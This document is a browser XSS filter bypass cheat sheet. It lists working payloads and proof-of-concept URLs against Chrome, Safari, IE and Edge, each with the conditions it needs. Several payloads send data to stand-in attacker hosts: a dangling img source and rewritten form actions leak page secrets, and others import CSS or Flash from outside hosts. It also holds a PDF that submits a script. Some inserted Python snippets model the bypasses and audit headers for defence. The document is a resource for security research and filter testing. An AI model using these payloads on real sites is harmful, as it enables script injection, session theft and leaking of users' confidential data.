https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet
2/20
1/1/2018
Browser's XSS Filter Bypass Cheat Sheet · masatokinugawa / filterbypass Wiki · GitHub
When there is manipulation of a character string

When the application deletes or replaces certain strings, the filter cannot block the payload if the deleted or replaced string is inserted in the middle of it.

When deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

    <svg o<script>nload=alert(1)>
    ↓
    <svg onload=alert(1)>

When substituted

https://vulnerabledoma.in/bypass/text?type=7&q=%3Cscript%3E/%26/-alert(1)%3C/script%3E

    <script>/&/-alert(1)</script>
    ↓
    <script>/&amp;/-alert(1)</script>

DOM based XSS other than document.write() of the request string

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

    <body>
    <script>
    hash = location.hash.slice(1);
    document.body.innerHTML = decodeURIComponent(hash);
    </script>
    </body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

    <script>
    location.href = decodeURIComponent(location.hash.slice(1));
    </script>
XSS in XML page

https://vulnerabledoma.in/bypass/xml?q=%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E

    <?xml version="1.0"?><html><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>

If a string can be written from the top of the page and the Content-Type is not specified correctly, a bypass also occurs when content sniffing selects XML.

https://vulnerabledoma.in/bypass/text?mime=unknown&q=%3C?xml%20version=%221.0%22?%3E%3Cscript%20xmlns=%22http://www.w3.org/1999/xhtml%22%3Ealert(1)%3C/script%3E

    <?xml version="1.0"?><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>

The following cannot execute script, but the markup is allowed through and can still be used for attacks to some extent.
http(s): link creation

https://vulnerabledoma.in/bypass/text?q=%3Ca%20href=https://attacker/%3ESession%20expired.%20Please%20login%20again.%3C/a%3E

    <a href=https://attacker/>Session expired. Please login again.</a>

A tag that can send requests to the outside

In some cases it is possible to include confidential information in a request such as an image load by using a quote that is not closed on one side.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

    <p>This is a secret text.</p>AAA</p><p><img src="https://

Writing arbitrary CSS

In addition to disguising the appearance of the page, if confidential information is on the same page, it may be possible to obtain it using CSS alone. See the reference URLs for details.

Reference URL:
http://www.businessinfo.co.uk/labs/talk/The_Sexy_Assassin.ppt
http://masatokinugawa.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html

https://vulnerabledoma.in/bypass/text?q=%3Cstyle%3E@import%20%27//attacker/test.css%27%3C/style%3E

    <style>@import '//attacker/test.css'</style>

https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=stylesheet%20href=//attacker/test.css%3E

    <link rel=stylesheet href=//attacker/test.css>
Using Flash (Chrome only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. Flash is available in the target environment

Reference URL: http://masatokinugawa.l0.cm/2016/12/xss12.html

PoC:
https://vulnerabledoma.in/bypass/text?q=%3Cobject%20allowscriptaccess=always%3E%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

    <object allowscriptaccess=always><param name=url value=https://l0.cm/xss.swf>

https://vulnerabledoma.in/bypass/text?q=%3Cobject%20allowscriptaccess=always%3E%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E

    <object allowscriptaccess=always><param name=code value=https://l0.cm/xss.swf>
Using the values attribute of SVG animation (Safari only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags

Reference URL:
https://bugs.chromium.org/p/chromium/issues/detail?id=709365
https://bugs.chromium.org/p/chromium/issues/detail?id=738017

PoC: https://vulnerabledoma.in/bypass/text?q=%3Csvg%20xmlns:xlink=http://www.w3.org/1999/xlink%3E%3Canimate%20xlink:href=%23x%20attributeName=%22xlink:href%22%20 … %3C/a%3E

    <svg xmlns:xlink=http://www.w3.org/1999/xlink><animate xlink:href=#x attributeName="xlink:href" …

Use of multiple null characters (Safari only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. A null byte is output
3. There is no space character immediately before the injection point

Reference URL: https://twitter.com/0rbz_/status/896896095862669312

PoC: https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E

    [0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>

Using --> comments in a script tag (Safari only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. A closing script tag follows the injection point with no line feed in between

Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=753307

PoC: https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E

    <div><script>alert(1)
    --></div><script src=/test.js></script>
Using an odd base tag (Safari only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. Either there is no space character immediately after the injection point, or a `'` or `"` follows it
3. Flash is available in the target environment

Reference URL: http://masatokinugawa.l0.cm/2016/05/xss8.html

PoC:
(If there is no space character immediately after)
https://vulnerabledoma.in/bypass/text?type=3&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=//l0.cm/

    <div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/

(If there is a space character immediately after)
https://vulnerabledoma.in/bypass/text?type=4&q=%3Cembed%20allowscriptaccess=always%20src=/xss.swf%3E%3Cbase%20href=%22//l0.cm/

    <div><embed allowscriptaccess=always src=/xss.swf><base href="//l0.cm/
Using a script loaded with a relative URL

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. Either there is no space character immediately after the injection point, or a `'` or `"` follows it
3. After the injection point there is a script loaded with a relative URL

PoC: https://vulnerabledoma.in/bypass/text?type=9&q=%3Cbase%20href=//cors.l0.cm/

    <div><base href=//cors.l0.cm/</div><script src=/test.js></script>
Use of ISO-2022-JP escape sequences

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. There is no character code designation on the page

Supplement: In ISO-2022-JP HTML, the byte sequences [0x1B](B, [0x1B](H and [0x1B](J are ignored. The filter can be bypassed by sandwiching one of them inside a string that would otherwise be blocked. Also, in Chrome / Safari the byte string [0x1B]$@[0x0A] is handled the same way as [0x0A], but the XSS Auditor cannot interpret it correctly and a bypass occurs.

Reference URL:
https://bugs.chromium.org/p/chromium/issues/detail?id=114941
https://l0.cm/encodings/test3/

PoC:
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Hnload=alert(1)%3E
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Jnload=alert(1)%3E

    <meta charset=iso-2022-jp><svg o[0x1B](Bnload=alert(1)>

(* Because `$` gets encoded and the vector then does not work as intended, the PoCs that include `$` are delivered through a redirect.)

https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0A%3C/script%3E
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$B%0A%3C/script%3E
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C/script%3E
https://vulnerabledoma.in/bypass/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C/script%3E

    <meta charset=iso-2022-jp><script>alert(1)[0x1B]$@[0x0A]</script>
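As an added illustration (not part of the cheat sheet), the Python snippet below shows why a check that pattern-matches the raw bytes misses the ISO-2022-JP escape sequence while the browser, decoding the page as ISO-2022-JP, still ends up with `onload`. The response body, the blocking pattern and the helper names are constructed for this example; Python's own `iso-2022-jp` codec stands in for the browser's decoder. The last two functions show the defender's side of the same condition: if the Content-Type header carries an explicit charset, the `<meta charset>` in the body no longer decides how the page is decoded.

```python
import re
from typing import Optional

ESC = b"\x1b"

# Constructed response bodies: no charset in the Content-Type header, the attacker-
# controlled part carries an ISO-2022-JP escape sequence inside the attribute name.
BODY_ESC_B = b"<meta charset=iso-2022-jp><svg o" + ESC + b"(Bnload=alert(1)>"
BODY_ESC_J = b"<meta charset=iso-2022-jp><svg o" + ESC + b"(Jnload=alert(1)>"

# Hypothetical blocking pattern for this demo (not the XSS Auditor's real rule).
BLOCK_PATTERN = re.compile(r"<svg\s+onload=", re.IGNORECASE)


def matches_raw(body: bytes) -> bool:
    """Byte-level scan: every byte is one character (latin-1), so the escape
    sequence keeps 'o' and 'nload' apart and the pattern never matches."""
    return BLOCK_PATTERN.search(body.decode("latin-1")) is not None


def decoded_view(body: bytes, charset: str) -> str:
    """Text the browser will actually parse once it decodes with `charset`.
    The iso-2022-jp codec drops ESC ( B and ESC ( J, as the browser does."""
    return body.decode(charset)


def matches_decoded(body: bytes, charset: str) -> bool:
    """Same pattern, applied to the decoded text the browser sees."""
    return BLOCK_PATTERN.search(decoded_view(body, charset)) is not None


def effective_charset(content_type: Optional[str], body: bytes) -> str:
    """Charset the page ends up with: an explicit charset in the Content-Type
    header wins; otherwise a <meta charset> in the body (attacker-reachable
    when the injection is near the top) decides; utf-8 is the fallback here."""
    if content_type:
        m = re.search(r"charset=([\w-]+)", content_type, re.IGNORECASE)
        if m:
            return m.group(1).lower()
    m = re.search(rb"<meta\s+charset=([\w-]+)", body, re.IGNORECASE)
    return m.group(1).decode("ascii").lower() if m else "utf-8"


def would_slip_through(content_type: Optional[str], body: bytes) -> bool:
    """True when the raw-byte scan is silent but the decoded page matches."""
    charset = effective_charset(content_type, body)
    return (not matches_raw(body)) and matches_decoded(body, charset)
```

Running `would_slip_through(None, BODY_ESC_B)` reports the mismatch; the same body served with `Content-Type: text/html; charset=utf-8` is decoded as UTF-8, where the escape bytes are inert and the attribute name stays split.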
Use of link and an odd base tag

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. There is a space character immediately after the injection point
3. A `'` or `"` follows after that

Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=719962

PoC: https://vulnerabledoma.in/bypass/text?type=4&q=%3Ca%20href=/**/alert(1)%3EXSS%3C/a%3E%3Cbase%20href=%22javascript:\

    <div><a href=/**/alert(1)>XSS</a><base href="javascript:\</div>
Use of resources on the same domain

XSS Auditor does not block the loading of same-domain resources that have no query string. If the resources needed for an attack can be placed on the same domain, a bypass is possible in some cases.

Case where the XSS is in the path (Chrome only)

Attackable conditions:
1. An XSS that can write arbitrary tags exists in the path
2. The page can be displayed without a query string

PoC: https://vulnerabledoma.in/bypass/path/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E

    PATH_INFO: /<link rel=import href="/bypass/path/<script>alert(1)</script>">

File upload function

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. Files uploaded by users are hosted on the same origin

PoC: https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=/bypass/usercontent/xss.js%3E%3C/script%3E

    <script src=/bypass/usercontent/xss.js></script>

(Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/usercontent/icon.jpg%3E

    <link rel=import href=/bypass/usercontent/icon.jpg>
Using Flash's flashvars

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. There is a Flash file on the same origin that passes parameter strings unprotected to ExternalInterface.call()
3. Flash is available in the target environment

Supplement: By using the flashvars attribute, parameters can be passed directly without putting the Flash parameters in the query string. (That is, even if the Flash side restricts parameter passing from the URL as an XSS countermeasure for the case where the Flash file is opened directly, parameters can still be passed in via flashvars.) Furthermore, when a CSP such as Content-Security-Policy: default-src 'self' is present, this can also be used as a CSP bypass.

PoC: https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\%22)(alert=alert(1)))}catch(e){}//%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E

    <embed name=a flashvars='autoplay=true&file="})\")-(alert=alert(1)))}catch(e){}//' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

    ExternalInterface.call("setTimeout", ExternalInterface.objectID + '_event' + "(''
Using Flash's ExternalInterface.call() with ExternalInterface.objectID

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. There is a Flash file on the same origin that passes ExternalInterface.objectID to ExternalInterface.call()
3. Flash is available in the target environment

Supplement: ExternalInterface.objectID is a property that holds the value of the name attribute of the tag used for embedding. It cannot cause XSS by itself, but it can be used for the bypass. It can also be used to bypass a CSP, for example when a restriction like Content-Security-Policy: default-src 'self' is present.

PoC: https://vulnerabledoma.in/bypass/text?csp=self&q=%3Cembed%20name=%27alert(1)%27%20allowscriptaccess=always%20src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf%3E

    <embed name='alert(1)-' allowscriptaccess=always src=//vulnerabledoma.in/bypass/wp-includes/js/mediaelement/flashmediaelement.swf>

ActionScript:

    ExternalInterface.call(ExternalInterface.objectID + '_init');
Using Angular

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. On the same origin there is a page hosting Angular, or loading Angular from a CDN that supports CORS

Supplement: Angular expands templates enclosed in {{}} inside a tag that has the ng-app attribute. Templates can execute scripts.

Reference URL: http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

PoC: https://vulnerabledoma.in/bypass/text?q=%3Cscript%20src=%22/js/angular1.6.4.min.js%22%3E%3C/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}

    <script src="/js/angular1.6.4.min.js"></script><p ng-app>{{constructor.constructor('alert(1)')()}}

If there is a page on the same origin that loads Angular from a CDN that supports CORS, resources of an external origin can also be loaded indirectly through HTML Imports. (Chrome only)

https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}

    <link rel=import href=angular.html><p ng-app>{{constructor.constructor('alert(1)')()}}

Use of Vue.js

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. On the same origin there is a page hosting Vue.js, or loading it from a CDN that supports CORS
3. On that page or on the same origin there is a script that performs template expansion on a specially crafted tag

PoC: (This example is for Chrome only) https://vulnerabledoma.in/bypass/text?q=%3Clink%20rel=import%20href=/bypass/vue.html%3E%3Cdiv%20id=app%3E{{constructor.constructor(%27alert(1)%27)()}}

    <link rel=import href=/bypass/vue.html><div id=app>{{constructor.constructor('alert(1)')()}}
Using jQuery

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. There is a page hosting jQuery on the same origin, or loading jQuery from a CDN that supports CORS
3. On that page or on the same origin there is a script that can run one of jQuery's insertion functions on a specially crafted form tag

Supplement: jQuery's insertion functions are after, before, prepend, append, html, replaceWith, wrap, wrapAll, insertBefore, insertAfter, prependTo, appendTo and the like. By using a form element whose name attribute is ownerDocument, the reference target of Node.ownerDocument can be confused (this technique is known as DOM Clobbering), so that scripts are executed in a situation where they originally would not be. Furthermore, there is processing in which a comment section surrounded by <!-- --> is evaluated as a script.

PoC: (This example is for Chrome only) https://vulnerabledoma.in/bypass/text?charset=utf8&type=1&q=%3Clink%20rel=import%20href=/bypass/babel-standalone.html%3E%3Csvg%3E%3Cscript%20type=%22text/jsx%22%3E//%3C!--%0aalert(1)//--%3E%3C/svg%3E%3Cscript%3E0%3C/script%3E

    <link rel=import href=/bypass/babel-standalone.html><svg><script type="text/jsx">//<!--
    alert(1)//--></svg><script>0</script>
Use of an odd form tag (information acquisition only) (Safari only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. A new form tag can be placed at a position where it becomes the destination of the existing form contents, which include confidential information

Reference URL: https://bugs.chromium.org/p/chromium/issues/detail?id=719092

PoC:
(If the injection point is inside the form)
https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/

    <form action="form">
    <input type="hidden" name="q" value=""></form><form action=https://attacker/">
    <input type="hidden" name="secret" value="a09d3ef0">
    </form>

(If the injection point is outside the form)
https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/

    <div><button form=f>CLICK<form id=f action=https://attacker/</div>
    <form action="form2">
    <input type="hidden" name="secret" value="a09d3ef0">
    </form>
Past bypasses are posted in the Fixed Bypass Archive.

IE / Edge's XSS filter

Those not blocked

XSS occurring in string literals

Supplement: There used to be a blocking condition for string literals. Although part of it still remains at present, assignment to location, which is obviously exploitable and had been blocked until then, is now permitted, which is equivalent to no protection. Since they apparently no longer intend to provide protection here, this is classified as "not subject to blocking" rather than as a bypass.

https://vulnerabledoma.in/bypass/str_literal?q=%22%3Blocation='javascript\x3Aalert\x281\x29'//

    <script>var q="";location='javascript\x3Aalert\x281\x29'//"</script>

All DOM based XSS

https://vulnerabledoma.in/bypass/dom_docwrite#%3Cimg%20src=x%20onerror=alert(1)%3E

    <script>
    hash = location.hash.slice(1);
    document.write(decodeURIComponent(hash));
    </script>

https://vulnerabledoma.in/bypass/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E

    <body>
    <script>
    hash = location.hash.slice(1);
    document.body.innerHTML = decodeURIComponent(hash);
    </script>
    </body>

https://vulnerabledoma.in/bypass/dom_redirect#javascript:alert(1)

    <script>
    location.href = decodeURIComponent(location.hash.slice(1));
    </script>

XSS with more than one injection point per page

https://vulnerabledoma.in/bypass/text?type=2&q=%22src=data:,alert%25281%2529%3E%3C/script%3E%3Cscript%20x=%22

    <div>"src=data:,alert%281%29></script><script x="</div>"src=data:,alert%281%29></script><script x="</div>
When there is manipulation of a character string

When the application deletes or replaces certain strings, the filter cannot block the payload if the deleted or replaced string is inserted in the middle of it.

When deleted

https://vulnerabledoma.in/bypass/text?type=6&q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E

    <svg o<script>nload=alert(1)>
    ↓
    <svg onload=alert(1)>

When substituted

In the filter's regular expressions, the positions represented by `.` have a fixed maximum width, so once a replacement expands the string beyond that width it can no longer be blocked. In the following case, a replacement of `&` is used to avoid matching the blocking condition: `/` and `&` correspond to wildcards of 0-3 characters and 0-5 characters, so the maximum width that can be blocked is 8 characters. The output after `/&` is replaced is 10 characters long, which exceeds the 8-character width, so it cannot be blocked.

PoC: https://vulnerabledoma.in/bypass/text?type=10&q=%3Cscript/%26%3Ealert(1)%3C/script%3E

    <script/&>alert(1)</script>
    ↓
    <script/&amp;>alert(1)</script>
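The two "manipulation of a character string" cases above (Chrome and IE / Edge) share one cause: the browser-side filter compares dangerous markup in the response against the request string, and a server-side delete or replace makes the served fragment differ from what was sent. The Python below is an added example, not code from the cheat sheet or any browser; `reflection_check` is a deliberately simplified stand-in for that comparison, and the deny-list, patterns and inputs are constructed here. It also shows the server-side fix, context-aware output encoding, under which no fragment is deleted or rewritten into something new.

```python
import html
import re

# Constructed deny-list for a hypothetical "delete the bad string" server filter.
DENY_LIST = ("<script>",)

# Hypothetical pattern for markup the browser-side filter would consider dangerous.
DANGEROUS = re.compile(
    r"<svg[^>]*\bon[a-z]+=[^>]*>|<script[^>]*>[^<]*</script>", re.IGNORECASE
)


def delete_filter(value: str) -> str:
    """Server-side transform: delete deny-listed tokens in a single pass."""
    for token in DENY_LIST:
        value = value.replace(token, "")
    return value


def ampersand_filter(value: str) -> str:
    """Server-side transform: entity-encode '&' and nothing else."""
    return value.replace("&", "&amp;")


def safe_text(value: str) -> str:
    """Mitigation: encode every HTML metacharacter for a text/attribute context.
    Nothing is removed, so no new tag can be assembled from the remainder."""
    return html.escape(value, quote=True)


def reflection_check(request_value: str, served: str) -> dict:
    """Simplified model of a reflection-based filter: a dangerous fragment in the
    served page is only treated as reflected (and blocked) when the identical
    text is also present in the request string."""
    found = [m.group(0) for m in DANGEROUS.finditer(served)]
    return {
        "dangerous_in_served": found,
        "matched_to_request": [f for f in found if f in request_value],
        "slipped": [f for f in found if f not in request_value],
    }
```

For the deletion case the served page contains `<svg onload=alert(1)>` while the request only ever contained `<svg o<script>nload=alert(1)>`, so the fragment is reported as `slipped`; the `&` case behaves the same way. The `safe_text` output contains no tag at all, which is the property the server should guarantee regardless of any browser-side filter.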
The following cannot execute script, but the markup is allowed through and can still be used for attacks to some extent.

A tag that can send requests to the outside

In some cases it is possible to include confidential information in a request such as an image load by using a quote that is not closed on one side.

https://vulnerabledoma.in/bypass/text?type=8&q=%3Cimg%20src=%22https://attacker/?data=

    <p>This is a secret text.</p>AAA</p><p><img src="https://

Use of a string disguised as an XML namespace (Edge only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. Flash is enabled in the target environment
3. The `X-XSS-Protection: 1; mode=block` header is not attached

Supplement: Edge also tries to block tags with an XML namespace.
PoC: https://vulnerabledoma.in/bypass/text?q=%3Cembed/:script%20allowscriptaccess=always%20src=//l0.cm/xss.swf%3E

    <embed/:script allowscriptaccess=always src=//l0.cm/xss.swf>

Use of the HZ-GB-2312 escape sequence

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. There is no character code designation in the Content-Type header

Reference URL: http://masatokinugawa.l0.cm/2015/09/xss7.html

PoC: https://vulnerabledoma.in/bypass/text?q=%3Cx~%0Aonfocus=alert%281%29%20id=a%20tabindex=0%3E#a

    <x~
    onfocus=alert(1) id=a tabindex=0>
Use of encoding behavior during navigation

Attackable conditions:
1. There is a reflected XSS via GET

Supplement: When navigating, IE / Edge encode the query string with the character code of the page before navigation and send the request. At that time, since the XSS filter checks the (probably) encoded string itself rather than the request actually being sent, a discrepancy between the encoded string and the bytes actually transmitted can cause a bypass. A specific example, with the character code x-chinese-cns used in the following PoC: in x-chinese-cns, the character 旡 is mapped to 0xA13E. If a query containing the string <script/旡 is sent from a page that has x-chinese-cns set as its character code, to a parameter that has reflected XSS, the transmitted request contains 旡 not as its UTF-8 representation but as the bytes encoded by x-chinese-cns itself (0x3E is >), and a <script> tag is written into the page. Normally, writing a <script> tag should make the XSS filter react, but here it does not. Presumably this is because the filter sees the string as <script/旡, which does not match the blocking condition.

Reference URL: http://masatokinugawa.l0.cm/2017/05/xss14.html

PoC: https://l0.cm/bypass/ie_x-chinese-cns_text.html

    <meta charset=utf-8>
    <script>
    document.charset = "x-chinese-cns";
    location = "https://vulnerabledoma.in/bypass/text?q=<script/旡alert(1)<\/script";
    </script>

(In case of XSS with attribute value only) https://l0.cm/bypass/ie_x-chinese-cns_attribute.html

    <meta charset=utf-8>
    <script>
    document.charset = "x-chinese-cns";
    location = "https://vulnerabledoma.in/bypass/attribute?q=乜 onmouseover=alert
    </script>

A bypass is also possible with other character codes, as long as a mismatch can be made between the encoded string and the bytes actually transmitted.

https://l0.cm/bypass/ie_hz_text.html
https://l0.cm/bypass/ie_hz_attribute.html
https://l0.cm/bypass/ie_iso2022jp_text.html
https://l0.cm/bypass/ie_iso2022jp_attribute.html

(The following seems to work on a slightly different principle from the other vectors, and the exact principle is not understood: it reproduces in a Japanese-locale environment but did not reproduce in a German environment. Posted for reference.)

https://l0.cm/bypass/ie_0xff_text.html
https://l0.cm/bypass/ie_0xff_attribute.html
Using the Adobe Acrobat Reader plug-in (IE only)

Attackable conditions:
1. There is an XSS via a POST request
2. The target is using the Adobe Acrobat Reader plug-in

Reference URL: http://insert-script.blogspot.com/2017/01/complete-internet-explorer-xss-filter.html

PoC: https://l0.cm/bypass/ie_postxss_bypass.pdf

    %PDF-1.1
    1 0 obj
    <<
    /Type /Catalog
    /Outlines 2 0 R
    /Pages 3 0 R
    /OpenAction 33 0 R
    /AcroForm 22 0 R
    >>
    endobj
    2 0 obj
    <<
    /Type /Outlines
    /Count 0
    >>
    endobj
    3 0 obj
    <<
    /Type /Pages
    /Kids [4 0 R]
    /Count 1
    >>
    endobj
    4 0 obj
    <<
    /Type /Page
    /Annot [ 23 0 R ]
    /Parent 3 0 R
    /MediaBox [0 0 612 792]
    /Contents 5 0 R
    /Resources <<
    /ProcSet [/PDF /Text]
    /Font << /F1 6 0 R >>
    >>
    >>
    endobj
    5 0 obj
    << /Length 56 >>
    stream
    BT
    /F1 12 Tf
    100 700 Td
    15 TL
    (JavaScript example) Tj
    ET
    endstream
    endobj
    6 0 obj
    <<
    /Type /Font
    /Subtype /Type1
    /Name /F1
    /BaseFont /Helvetica
    /Encoding /MacRomanEncoding
    >>
    endobj
    33 0 obj
    <<
    /S /SubmitForm
    /F <<
    % URL TO SUBMIT TO:
    /F (https://vulnerabledoma.in/bypass/text)
    /FS /URL
    >>
    % SPECIFIES THE FORMAT AND OTHER FORM RELATED CONFIGURATION
    /Flags 6
    >>
    endobj
    22 0 obj
    <<
    /Fields [23 0 R]
    >>
    endobj
    23 0 obj
    <<
    /DA (/Helv 12 Tf 0 g)
    /F 4
    /FT /Tx
    /Rect [ 9.526760 680.078003 297.527008 702.078003 ]
    /Subtype /Widget
    /Type /Annot
    % PARAMETER NAME
    /T (q)
    % PARAMETER PAYLOAD
    /V (<script>alert\(1\))
    /P 4 0 R
    >>
    endobj
    trailer
    <<
    /Root 1 0 R
    >>
Use of Content Sniffing in XML (IE only)

Attackable conditions:
1. There is an XSS that can write arbitrary tags
2. `X-Content-Type-Options: nosniff` is not set
3. A string can be written from the top of the page

Reference URL: https://twitter.com/0x6D6172696F/status/753647521050849280

PoC: https://vulnerabledoma.in/bypass/text?q=%3C?xml%20version=%221.0%22?%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%281%26%23x29%3B%3C/x:script%3E

    <?xml version="1.0"?><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1&#x29;</x:script>
UTF-7 BOM usage (IE only)

Attackable conditions:
1. A string can be written from the top of the page
2. Symbols such as `+`, `/` and `-` are allowed

Supplement: `+/v8`, `+/v9`, `+/v+` and `+/v/` are treated as a UTF-7 BOM. In IE, when one of these strings is at the top of the page, the page's character code is assumed to be UTF-7. Even if a character code is specified in the page, if the page is reopened via history.back(), its character code is treated as UTF-7. (Note that the latter behavior was reported to Microsoft in July 2013, but no change in behavior has been made so far.)

PoC:
(When the character code is not specified on the page)
https://vulnerabledoma.in/bypass/text?q=%2B/v8%2BADw-script%2BAD4-alert(1)%2BADw-/script%2BAD4-

    +/v8-+ADw-script+AD4-alert(1)+ADw-/script+AD4-

(When the character code is specified on the page)
https://l0.cm/bypass/ie_utf7.html

    <script>
    function go() {
        window.open("https://vulnerabledoma.in/bypass/text?q=%2B/v8-%2BADw-script%2BAD4-alert(
    </script>
    <button onclick=go()>go</button>
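Several of the IE / Edge conditions above come down to response headers: no charset designation (the ISO-2022-JP, HZ-GB-2312 and UTF-7 BOM vectors), no `X-Content-Type-Options: nosniff` (content sniffing in XML) and no `X-XSS-Protection: 1; mode=block` (the Edge XML-namespace vector). The Python below is an added example, not code from the cheat sheet, that audits a response's headers for exactly those three conditions; the header sets, the `audit_headers` function and its messages are constructed for this example. It treats the headers as a hardening layer around a best-effort browser filter, not as a replacement for output encoding.

```python
import re
from typing import Dict, List

# Constructed header sets for the demo (not captured from any real server).
WEAK_HEADERS = {
    "Content-Type": "text/html",
}
HARDENED_HEADERS = {
    "Content-Type": "text/html; charset=utf-8",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "1; mode=block",
}


def _normalize(headers: Dict[str, str]) -> Dict[str, str]:
    """Header names are case-insensitive; compare them lower-cased."""
    return {name.lower(): value for name, value in headers.items()}


def declared_charset(content_type: str) -> str:
    """Charset parameter of a Content-Type value, lower-cased, or '' if absent."""
    m = re.search(r";\s*charset\s*=\s*\"?([\w.:-]+)", content_type, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return one finding per missing header condition (empty list = none missing)."""
    h = _normalize(headers)
    findings: List[str] = []

    content_type = h.get("content-type", "")
    if not content_type:
        findings.append("missing Content-Type: the body is sniffed and another type such as XML may be chosen")
    else:
        mime = content_type.split(";")[0].strip().lower()
        if mime.startswith("text/") and not declared_charset(content_type):
            findings.append("no charset in Content-Type: the encoding comes from the body or from detection (ISO-2022-JP, HZ-GB-2312, UTF-7 BOM)")

    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")

    xss_protection = h.get("x-xss-protection", "").replace(" ", "").lower()
    if not xss_protection.startswith("1;mode=block"):
        findings.append("X-XSS-Protection: 1; mode=block not set")

    return findings
```

`audit_headers(WEAK_HEADERS)` yields all three findings and `audit_headers(HARDENED_HEADERS)` none; a non-text type such as `application/xml` is exempt from the charset check but still reported for the other two headers.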
Use of PXML (IE only)

Attackable conditions:
1. There is a reflected XSS
2. Three or more `<` do not appear before the injection point
3. The document mode of the page is 9 or lower (a document mode of 9 or lower can also be set by embedding the page in a frame, etc.)

Reference URL: http://masatokinugawa.l0.cm/2017/05/xss13.html

PoC: https://vulnerabledoma.in/bypass/text?q=%3C?PXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

    <?PXML><html:script>alert(1)</html:script>

https://vulnerabledoma.in/bypass/text?q=%3CPXML%3E%3Chtml:script%3Ealert(1)%3C/html:script%3E&xuac=9

    <PXML><html:script>alert(1)</html:script>
Using referrers

IE / Edge's XSS filter does not operate when a Referer header from the same domain (including subdomains) or from localhost is attached. If such a referrer can be attached, a bypass is possible.

Use of a link function in the same domain (including subdomains)

Attackable conditions:
1. There is a reflected XSS
2. Links to the XSS page can be created in the same domain (including subdomains)

PoC:
